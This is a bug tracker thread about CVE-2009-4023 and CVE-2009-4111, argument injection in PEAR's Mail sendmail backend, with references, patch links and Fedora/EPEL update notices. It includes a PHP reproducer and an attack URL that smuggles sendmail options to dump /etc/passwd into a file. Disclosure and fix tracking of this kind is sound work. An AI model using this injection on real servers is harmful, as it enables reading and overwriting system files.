PEAR's Mail class did not properly escape content of mail header fields, when using the sendmail backend. A remote attacker could send an email message, with specially-crafted headers to local user, leading to disclosure of content and potentially, to modification of arbitrary system file, once the email message was processed by the PEAR's Mail class. References: ----------- http://pear.php.net/bugs/bug.php?id=16200 http://bugs.debian.org/557121 http://secunia.com/advisories/37410/ http://www.debian.org/security/2009/dsa-1938 Upstream patch: --------------- http://pear.php.net/bugs/bug.php?id=16200&edit=12&patch=quick-fix&revision=1241757412 Please pay attention also to comment: [2009-11-21 08:19 UTC] rgeissert (Raphael Geissert) which suggest the proposed patch might be incomplete. CVE Request: ------------ http://www.openwall.com/lists/oss-security/2009/11/23/13
Reproducer: ----------- <?php ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:'); require_once("Mail.php"); $from = "From: " . $_REQUEST['email'] . "\r\n"; $to = "xxxxxxx"; $subj = "subscription request"; $body = "subscribe me"; $hdrs = array( "To" => $to, "Cc" => $cc, "Bcc" => $bcc, "From" => $from, "Subject" => $subject, ); $body="test"; $mail =& Mail::factory('sendmail'); $mail->send($to, $hdrs, $body); ?> test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3 Note: You might need to change the patch to ':/usr/share/pear/:'. After this I can view the content of my /etc/passwd with some add-ons as /tmp/wokao.
This issue affects the versions of the php-pear-Mail package, as shipped with Fedora release of 10, 11, 12 and as shipped with Extra Packages for Enteprise Linux 5 (EPEL-5) project. Please fix.
This is CVE-2009-4023.
php-pear-Mail-1.1.14-5.el5.1 has been submitted as an update for Fedora EPEL 5. http://admin.fedoraproject.org/updates/php-pear-Mail-1.1.14-5.el5.1
Common Vulnerabilities and Exposures assigned a separate identifier of CVE-2009-4111 for the missing sanitization of the $recipients header of php-pear-Mail: Argument injection vulnerability in Mail/sendmail.php in the Mail package 1.1.14, 1.2.0b2, and possibly other versions for PEAR allows remote attackers to read and write arbitrary files via a crafted $recipients parameter, and possibly other parameters, a different vulnerability than CVE-2009-4023. References: ----------- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4111 http://www.openwall.com/lists/oss-security/2009/11/23/8 http://www.openwall.com/lists/oss-security/2009/11/28/2 http://pear.php.net/bugs/bug.php?id=16200 https://bugs.gentoo.org/show_bug.cgi?id=294256
php-pear-Mail-1.1.14-5.fc11 has been pushed to the Fedora 11 stable repository. If problems still persist, please make note of it in this bug report.
php-pear-Mail-1.1.14-5.fc12 has been pushed to the Fedora 12 stable repository. If problems still persist, please make note of it in this bug report.
php-pear-Mail-1.1.14-5.fc10 has been pushed to the Fedora 10 stable repository. If problems still persist, please make note of it in this bug report.
php-pear-Mail-1.1.14-5.el5.1 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report.